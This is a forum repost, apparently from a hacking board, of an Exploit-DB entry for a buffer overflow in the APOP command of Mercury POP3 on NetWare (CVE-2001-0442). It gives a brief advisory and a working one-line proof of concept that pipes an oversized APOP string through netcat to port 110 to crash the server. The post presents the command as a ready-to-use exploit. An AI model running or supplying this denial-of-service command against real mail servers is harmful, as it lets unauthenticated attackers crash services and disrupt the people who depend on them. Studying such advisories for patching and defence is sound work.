Exploit Mercury/NLM 1.4 - Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20792
Проверка EDB
  1. Пройдено
Автор
PRZEMYSLAW FRASUNEK
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2001-0442
Дата публикации
2001-04-21
Код:
source: https://www.securityfocus.com/bid/2641/info

Mercury MTA is a mail-transfer agent available for Novell NetWare and Windows NT. Novell versions of the Mercury POP3 server prior to 1.48 are vulnerable to a buffer overflow caused by inadequate string handling for the APOP authentication command.

Because the overflow occurs in an authentication command parser, unauthenticated remote users can trigger the overflow. It is unknown whether the overflow can lead to arbitrary code execution, but proof-of-concept code is available that will crash the NetWare server, requiring a reboot. 

perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc mercury_host 110
 
Источник
www.exploit-db.com

Похожие темы